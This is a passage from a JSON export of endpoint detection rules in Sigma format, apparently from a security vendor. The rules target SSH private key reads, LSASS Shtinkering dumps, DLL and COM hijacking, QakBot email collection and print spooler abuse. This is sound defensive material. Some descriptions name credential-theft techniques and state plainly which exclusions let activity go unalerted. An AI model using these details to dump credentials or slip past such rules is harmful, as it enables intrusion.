/usr/bin/python3 /usr/local/bin/ansible-connection 1663518 4d9a5512-5360-d1ac-3a5c-00000000005b\n ProcessCommandLine: '/usr/bin/python3 
/usr/local/bin/ansible-connection ??????? ????????-????-????-????-????????????'\n\n exclusion_proxmox:\n ProcessImage: '/usr/bin/proxmox-backup-client'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n - '/opt/tanium/taniumclient/taniumclient '\n\n exclusion_ibm_aspera:\n ProcessImage: '/opt/aspera/orchestrator-*/vendor/ruby/bin/ruby'\n\n exclusion_legitimate_process:\n - ProcessImage:\n - '/opt/qradar/ca/bin/si-qradarca'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/libexec/xdg-document-portal'\n - '/kaniko/executor'\n - '/opt/ds_agent/ds_am'\n - '/usr/bin/remmina'\n - '/opt/omni/lbin/vbda'\n - '/usr/local/cellar/openssh/*/bin/ssh'\n - '/usr/bin/keepassxc'\n - '/usr/libexec/gcr-ssh-agent'\n - '/usr/sbin/veeamagent'\n - '/usr/bin/rsync'\n - '/usr/bin/git'\n - '/gnu/store/*/bin/git'\n - '/usr/bin/fzsftp'\n - '/usr/bin/lsattr'\n - '/usr/bin/file'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/fzputtygen'\n - '/opt/endpoint-agent/agent' # sekoia agent\n - '/usr/libexec/openssh/sftp-server'\n - '/opt/podman/bin/krunkit'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/usr/bin/tar'\n - ProcessCommandLine:\n - 'airflow worker -- localexecutor'\n - '/opt/airflow/bin/celery -A airflow.executors.*'\n - '[celeryd: celery@*:ForkPoolWorker-*]'\n - '/opt/qradar/ca/bin/si-qradarca monitor -debug'\n - '/opt/atempo/hn/bin/hnagent'\n - '/usr/libexec/xdg-document-portal'\n - 'puma * (tcp://0.0.0.0:8888) [/]'\n - 'java -dtalend.component.manager.m2.repository=*'\n - 'ruby /usr/local/bundle/bin/bundle exec sidekiq -c config/sidekiq_node.yml*'\n - 'python */pulse_xmpp_agent/agentxmpp.py -d -t relayserver'\n - '/usr/bin/python3 */pulse_xmpp_agent/agentxmpp.py -d -t relayserver'\n - 'sidekiq * [* of * busy]'\n - '/usr/bin/java * -dconfig=/etc/centreon-bi/*config.properties*'\n - '/opt/ds_agent/ds_am*'\n - 'remmina'\n - '*airflow-project/airflow-env/bin/python3 -m gunicorn*'\n - 'airflow worker 
-- localexecutor: *'\n - '/usr/bin/lsattr -vd /root/.ssh/id_dsa_rsync'\n - '/usr/bin/python3 -sp /usr/bin/borg create *'\n - 'aide --config=/etc/aide/aide.conf --update'\n - '/usr/bin/ruby /usr/bin/puppet agent *'\n - '/bin/sh /bin/ssh-copy-id *'\n - ProcessParentImage:\n - '/usr/bin/rsync'\n - '/usr/libexec/gvfsd'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentCommandLine|contains: '/opt/airflow/bin/celery'\n\n exclusion_aide:\n ProcessImage|endswith: '/bin/aide'\n\n exclusion_tomcat:\n ProcessCommandLine|contains: '/bin/java -Djava.util.logging.config.file='\n ProcessParentCommandLine|startswith:\n - '/bin/sh /opt/tomcat/*/bin/catalina.sh '\n - '/usr/lib/systemd/systemd'\n\n exclusion_container:\n ProcessAncestors|contains:\n - '|/usr/bin/dockerd-current|'\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_enovacom:\n ProcessAncestors|startswith: '/usr/enovacom/eai/ext/bin/wrapper-linux-x86-64|'\n\n exclusion_telegraf:\n ProcessImage: '/usr/local/bin/ssh'\n ProcessCurrentDirectory: '/home/telegraf/'\n\n exclusion_cron:\n ProcessAncestors|endswith:\n - '|/usr/sbin/cron|/usr/lib/systemd/systemd'\n - '|/usr/sbin/crond|/usr/lib/systemd/systemd'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e5ceb02d-7761-4857-9490-099154c63e43",
"rule_name": "SSH Private Key Read",
"rule_description": "Detects an attempt to read the content of an SSH private key.\nThe private key is the most important and secretive piece of data used when connecting to a remote host via SSH.\nAn attacker can read the SSH private keys available on a compromised system to connect to other remote hosts and impersonate an existing user or service.\nIt is recommended to analyze the process responsible for reading the SSH private key and to determine if it is legitimate.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2025-11-24",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1552.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e5d1db90-73a9-4014-a85c-e240ee90e52e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605561Z",
"creation_date": "2026-03-23T11:45:34.605564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605571Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11)",
"https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1135/"
],
"name": "t1018_netview_remote_system_discovery.yml",
"content": "title: Remote Systems Discovered via net.exe\nid: e5d1db90-73a9-4014-a85c-e240ee90e52e\ndescription: |\n Detects the execution of net.exe with the \"view\" argument.\n This is commonly used by attackers for remote system reconnaissance when preparing for lateral movement.\n It is recommended to analyze the process tree to find the process responsible for the execution of net.exe and to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11)\n - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1135/\ndate: 2022/11/07\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1135\n - attack.s0039\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net.exe'\n - OriginalFileName: 'net.exe'\n\n selection_command:\n CommandLine|contains: ' view'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_connectwise:\n GrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Connectwise, LLC'\n\n exclusion_local_link_messaging:\n GrandparentImage|endswith: '\\Local file links Native Messaging API Host\\local-link-messaging-host.exe'\n\n exclusion_carestream:\n GrandparentImage:\n - '?:\\Program Files\\Carestream\\CS Trophy Gestion\\CS Trophy Gestion.Exe'\n - '?:\\Program Files (x86)\\Carestream\\CS Trophy Gestion\\CS Trophy Gestion.Exe'\n\n exclusion_fiducial:\n GrandparentImage:\n - '?:\\Program Files\\FIDUCIAL Informatique\\FIDUCIAL Update\\Fiducial.Update.Client.Service.exe'\n - '?:\\Program Files (x86)\\FIDUCIAL 
Informatique\\FIDUCIAL Update\\Fiducial.Update.Client.Service.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e5d1db90-73a9-4014-a85c-e240ee90e52e",
"rule_name": "Remote Systems Discovered via net.exe",
"rule_description": "Detects the execution of net.exe with the \"view\" argument.\nThis is commonly used by attackers for remote system reconnaissance when preparing for lateral movement.\nIt is recommended to analyze the process tree to find the process responsible for the execution of net.exe and to determine its legitimacy.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2025-09-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1135"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e5ef77ff-fe89-4189-86fd-f1fcbc53d81f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594325Z",
"creation_date": "2026-03-23T11:45:34.594329Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594336Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_packageinspector.yml",
"content": "title: DLL Hijacking via packageinspector.exe\nid: e5ef77ff-fe89-4189-86fd-f1fcbc53d81f\ndescription: |\n Detects potential Windows DLL Hijacking via packageinspector.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'packageinspector.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msi.dll'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e5ef77ff-fe89-4189-86fd-f1fcbc53d81f",
"rule_name": "DLL Hijacking via packageinspector.exe",
"rule_description": "Detects potential Windows DLL Hijacking via packageinspector.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e601af53-adea-47b0-a55f-e3ecbff5cd88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086247Z",
"creation_date": "2026-03-23T11:45:34.086248Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086253Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks",
"https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
"https://attack.mitre.org/techniques/T1114/001/"
],
"name": "t1114_001_quakbot_email_collection.yml",
"content": "title: QakBot Malware Email Collection Detected\nid: e601af53-adea-47b0-a55f-e3ecbff5cd88\ndescription: |\n Detects when QakBot malware creates a directory structure and log file indicative of email collection activities.\n QakBot uses this method to store stolen emails, creating an \"EmailStorage\" directory and a \"collector_log.txt\" file.\n It is recommended to investigate the context around the creation of the \"EmailStorage\" directory and the associated log file, and to check for the presence of other QakBot-related artifacts, such as scheduled tasks or registry entries.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://attack.mitre.org/techniques/T1114/001/\ndate: 2022/04/22\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1114.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Users\\\\*\\EmailStorage_*_??????????\\collector_log.txt'\n - '?:\\Windows\\system32\\config\\systemprofile\\EmailStorage_*_??????????\\collector_log.txt'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e601af53-adea-47b0-a55f-e3ecbff5cd88",
"rule_name": "QakBot Malware Email Collection Detected",
"rule_description": "Detects when QakBot malware creates a directory structure and log file indicative of email collection activities.\nQakBot uses this method to store stolen emails, creating an \"EmailStorage\" directory and a \"collector_log.txt\" file.\nIt is recommended to investigate the context around the creation of the \"EmailStorage\" directory and the associated log file, and to check for the presence of other QakBot-related artifacts, such as scheduled tasks or registry entries.\n",
"rule_creation_date": "2022-04-22",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1114.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e61629a5-eafd-4156-b60c-a7a61f7f1c70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623000Z",
"creation_date": "2026-03-23T11:45:34.623002Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623007Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Lsass-Shtinkering",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_registry_modification_lsass_shtinkering_global.yml",
"content": "title: Registry Modification Associated with LSASS Shtinkering\nid: e61629a5-eafd-4156-b60c-a7a61f7f1c70\ndescription: |\n Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\n LSASS Shtinkering is an LSASS dump technique that consists of sending a message to the Windows Error Reporting service to report an LSASS exception.\n This, along with the correct dump type set in the registry, will dump the LSASS process memory.\n This registry option might be enabled to aid Windows application developers with debugging.\n It is recommended to investigate the process performing the registry modification to determine its legitimacy; a legitimate context could be the debugging of an application.\n Note that modifications performed through regedit.exe are excluded by this rule, so a manual change of this value through the Registry Editor will not raise an alert.\nreferences:\n - https://github.com/deepinstinct/Lsass-Shtinkering\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/04/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType'\n Details: 'DWORD (0x00000002)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n 
ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_regedit:\n ProcessImage: '?:\\Windows\\regedit.exe'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_amazon:\n ProcessCommandLine: 'powershell.exe -ExecutionPolicy RemoteSigned -file ?:\\Program Files\\Amazon\\Photon\\Bootstrap\\bootstrap.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e61629a5-eafd-4156-b60c-a7a61f7f1c70",
"rule_name": "Registry Modification Associated with LSASS Shtinkering",
"rule_description": "Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\nLSASS Shtinkering is an LSASS dump technique that consists of sending a message to the Windows Error Reporting service to report an LSASS exception.\nThis, along with the correct dump type set in the registry, will dump the LSASS process memory.\nThis registry option might be enabled to aid Windows application developers with debugging.\nIt is recommended to investigate the process performing the registry modification to determine its legitimacy; a legitimate context could be the debugging of an application.\nNote that modifications performed through regedit.exe are excluded by this rule, so a manual change of this value through the Registry Editor will not raise an alert.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e61f095a-874d-4e1b-8427-c3051e7e0f9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626893Z",
"creation_date": "2026-03-23T11:45:34.626896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626900Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_com_hijacking_dll_redirection.yml",
"content": "title: COM Hijacking via DLL Redirection\nid: e61f095a-874d-4e1b-8427-c3051e7e0f9b\ndescription: |\n Detects COM hijacking when a CLSID registry value that previously pointed to a DLL under System32 or SysWOW64 is modified to point to a DLL outside those directories.\n COM hijacking by DLL redirection is a technique where an attacker modifies a legitimate COM component's configuration to make it point to a malicious DLL so the host process unknowingly loads attacker code.\n When the COM object is instantiated, the replaced DLL runs in the context of the trusted process, enabling code execution, persistence, or privilege escalation without modifying the process binary.\n The detection relies on the previous value of the registry entry and is therefore only evaluated on agents of version 5.0 or later.\n It is recommended to check the process which set the registry key for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/10/23\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1546.015\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Classes\\CLSID\\{????????-????-????-????-????????????}\\'\n AgentVersion|gte|version: 5.0 # Previous registry info\n PreviousDetails|contains:\n - '\\System32\\'\n - '\\SysWOW64\\'\n\n filter_legit_directories:\n Details|contains:\n - '\\System32\\'\n - '\\SysWOW64\\'\n\n exclusion_citrix:\n Image: '?:\\Program Files\\Citrix\\Secure Access Client\\nsload.exe'\n ProcessSignature: 'Citrix Systems, Inc.'\n ProcessSigned: 'true'\n\n exclusion_dism:\n Image:\n - '?:\\Windows\\SystemTemp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n ProcessSignature: 'Microsoft 
Windows'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e61f095a-874d-4e1b-8427-c3051e7e0f9b",
"rule_name": "COM Hijacking via DLL Redirection",
"rule_description": "Detects COM hijacking when a CLSID registry value that previously pointed to a DLL under System32 or SysWOW64 is modified to point to a DLL outside those directories.\nCOM hijacking by DLL redirection is a technique where an attacker modifies a legitimate COM component's configuration to make it point to a malicious DLL so the host process unknowingly loads attacker code.\nWhen the COM object is instantiated, the replaced DLL runs in the context of the trusted process, enabling code execution, persistence, or privilege escalation without modifying the process binary.\nThe detection relies on the previous value of the registry entry and is therefore only evaluated on agents of version 5.0 or later.\nIt is recommended to check the process which set the registry key for suspicious activities.\n",
"rule_creation_date": "2025-10-23",
"rule_modified_date": "2026-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e62cf952-25f7-4ad2-b66c-70d6cdb5371d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606086Z",
"creation_date": "2026-03-23T11:45:34.606090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606097Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_suspicious_spoolsv_child_process.yml",
"content": "title: Suspicious Process Spawned by spoolsv.exe\nid: e62cf952-25f7-4ad2-b66c-70d6cdb5371d\ndescription: |\n Detects the execution of a suspicious process by the Windows Print Spooler binary.\n This can be the result of the exploitation of the CVE-2022-38028 vulnerability that allows attackers to escalate privileges to SYSTEM.\n Note that the rule excludes, among others, any child process located under Program Files, Program Files (x86) or the print spooler driver directories, so a payload started from one of those locations will not raise an alert.\n It is recommended to investigate the process spawned by spoolsv.exe and other suspicious activities on the machine before this action.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/04/23\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\spoolsv.exe'\n\n exclusion_image:\n Image:\n - '?:\\Windows\\System32\\spoolsv.exe'\n - '?:\\Windows\\System32\\conhost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\System32\\route.exe'\n - '?:\\Windows\\splwow64.exe'\n - '?:\\Windows\\System32\\cacls.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\wermgr.exe'\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\\\*'\n - '?:\\Windows\\System32\\spool\\drivers\\w32x86\\3\\\\*'\n - '*\\gs\\gs*\\bin\\gswin64c.exe'\n - '*\\gs\\gs*\\bin\\gswin32c.exe'\n - '?:\\CSPrinter\\Leica\\Application\\CSPrtHelp.exe'\n - '?:\\Windows\\System32\\th-2500sm.exe' # Thomson Status Monitor\n - '?:\\Windows\\System32\\pt2500sm.exe' # Zhuhai Pantum Electronics Co.,Ltd.\n - '?:\\Users\\\\*\\AppData\\Local\\GravoTechLaser\\bidiEthernet_GravoTech Laser.exe'\n - '?:\\Windows\\System32\\NPI_IGDoc.EXE'\n\n 
